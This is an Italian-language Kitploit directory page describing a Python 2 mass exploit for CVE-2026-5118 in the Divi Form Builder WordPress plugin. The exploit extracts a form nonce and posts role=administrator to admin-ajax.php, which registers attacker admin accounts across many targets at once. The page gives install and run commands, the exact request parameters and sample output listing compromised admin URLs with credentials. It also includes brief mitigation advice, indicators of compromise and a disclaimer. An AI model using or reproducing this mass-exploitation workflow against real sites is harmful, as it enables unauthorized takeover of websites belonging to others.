Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-5118 — CVE-2026-5118 – Exploit di massa in Python2 per il plugin WordPress Divi: registrazione di amministratore non autenticata tramite admin-ajax.php. Scanner multi-thread con estrazione del nonce. | Kitploit
Strumenti/GitHubGitHub/jenderal92/cve-2026-5118
Escalation di PrivilegiScanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazione
GitHubjenderal92/cve-2026-5118

CVE-2026-5118

CVE-2026-5118 – Exploit di massa in Python2 per il plugin WordPress Divi: registrazione di amministratore non autenticata tramite admin-ajax.php. Scanner multi-thread con estrazione del nonce.

Vedi Repository
3 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Divi Form Builder <= 5.1.2 - Escalation dei privilegi non autenticata tramite 'role'

⚠️ AVVERTENZA: Questo strumento è destinato esclusivamente a test di penetrazione autorizzati e ricerca sulla sicurezza.
L'accesso non autorizzato a sistemi informatici è illegale. Utilizzalo solo su sistemi di tua proprietà o per i quali hai ricevuto esplicito permesso scritto. Per ulteriori informazioni, consulta il disclaimer sulla copertina di Jenderal92. Puoi verificarlo QUI !!!

Panoramica

Questo script Python 2 sfrutta una vulnerabilità di escalation dei privilegi nel plugin WordPress Divi (e nei relativi moduli Divi). Consente la registrazione remota di un account amministratore tramite:

  • Estrazione del fb_nonce dal modulo di registrazione Divi del target.
  • Invio di una richiesta multipart appositamente predisposta a /wp-admin/admin-ajax.php con role=administrator.
  • Rilevamento automatico del successo e salvataggio degli URL admin compromessi.

Funzionalità

  • ✅ Multi-thread (20 thread predefiniti) per scansioni veloci.
  • ✅ Normalizzazione automatica degli URL – aggiunge https:// se mancante.
  • ✅ Estrazione del nonce tramite molteplici pattern regex (JavaScript inline, input nascosti, de_fb_obj).
  • ✅ Richiesta multipart/form-data che simula un invio legittimo da browser.
  • ✅ Rilevamento del successo tramite parole chiave nella risposta (success, user_id, user created, ecc.).
  • ✅ Risultati salvati in results.txt nel formato:
    https://target.com/wp-admin/ | username | password

Requisiti

  • Python 2.7 (usa urllib2, Queue, threading – non compatibile con Python 3 senza modifiche)
  • Un elenco di URL target (uno per riga)

Installazione

root@kitploit:~
git clone https://github.com/Jenderal92/CVE-2026-5118.git
cd CVE-2026-5118
chmod +x CVE-2026-5118.py

Utilizzo

1. Prepara l'elenco dei target

Crea un file di testo con un dominio o URL per riga. Puoi omettere http:// / https:// – lo script aggiungerà https:// di default.

Esempio targets.txt:

root@kitploit:~
example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
test-site.org

2. Esegui lo exploit

root@kitploit:~
python CVE-2026-5118.py targets.txt

3. Esempio di output

root@kitploit:~
[*] Total targets : 4
[*] Credentials   : Attacker / Attacker@123#+
[*] Threads       : 20
[*] Output file   : results.txt

[1] Checking https://example.com
[+] SUCCESS! https://example.com/wp-admin/

[2] Checking https://vulnerable-site.com
[+] SUCCESS! https://vulnerable-site.com/wp-admin/

[3] Checking http://192.168.1.100/wordpress
[3] FAILED  http://192.168.1.100/wordpress

[4] Checking https://test-site.org
[4] FAILED  https://test-site.org

=== DONE ===
Successful: 2 / 4

4. File dei risultati (results.txt)

root@kitploit:~
https://example.com/wp-admin/|Attacker|Attacker@123#+
https://vulnerable-site.com/wp-admin/|Attacker|Attacker@123#+

Configurazione

Puoi personalizzare le seguenti variabili all'inizio dello script:

Come Funziona

  1. Normalizza l'URL – aggiunge https:// se non è fornito uno schema.
  2. Estrae il nonce – recupera la homepage (o la pagina di registrazione) e cerca fb_nonce tramite pattern regex.
  3. Costruisce la richiesta – crea un POST multipart/form-data contenente:
    • action=de_fb_ajax_submit_ajax_handler
    • fb_nonce=<nonce estratto>
    • role=administrator
    • de_fb_user_login / user_login
    • de_fb_user_pass / user_pass
    • de_fb_user_email / user_email
  4. Invia a admin‑ajax.php – se la risposta contiene una qualsiasi parola chiave di successo, il target viene marcato come vulnerabile.

Rilevamento e Mitigazione

Per gli amministratori WordPress che utilizzano Divi:

  • Aggiorna Divi e tutti i plugin associati all'ultima versione.
  • Disabilita la registrazione pubblica se non necessaria.
  • Utilizza un plugin di sicurezza (Wordfence, Sucuri) per monitorare le richieste a admin-ajax.php.
  • Implementa reCAPTCHA su tutti i moduli di registrazione.
  • Non esporre mai moduli di registrazione con un parametro role manipolabile.

Indicatori di compromissione (IoC):

  • Richieste inattese a admin-ajax.php con action=de_fb_ajax_submit_ajax_handler
  • Nuovi utenti amministratori con nomi utente sospetti (es. Attacker)
  • Dati POST contenenti role=administrator nei log di accesso

Disclaimer Legale

Questo software è fornito a scopo didattico e esclusivamente per test di sicurezza autorizzati. L'autore non si assume alcuna responsabilità per usi impropri o danni causati da questo strumento. Utilizzando questo software, accetti di:

  • Ottenere permesso scritto dal proprietario del sistema prima di eseguire i test.
  • Rispettare tutte le leggi applicabili (CFAA, Computer Misuse Act, UU ITE, ecc.).
  • Eliminare immediatamente qualsiasi accesso non autorizzato ottenuto.
  • Segnalare le vulnerabilità in modo responsabile al fornitore interessato.

La violazione di questi termini può comportare azioni penali, multe o reclusione.

Contributi

Sono benvenute pull request per miglioramenti (porting a Python 3, migliore estrazione del nonce, rilevamento di percorsi di registrazione aggiuntivi). Si prega di mantenere il disclaimer etico.

Scarica lo strumento
VariabileDefaultDescrizione
DEFAULT_USERNAMEAttackerNome utente da registrare
DEFAULT_PASSWORDAttacker@123#+Password (complessa con caratteri speciali)
DEFAULT_EMAIL[email protected]Indirizzo email
THREAD_COUNT20Numero di thread concorrenti
OUTPUT_FILEresults.txtFile in cui salvare i target compromessi
  • Salva il risultato – scrive l'URL admin e le credenziali nel file di output.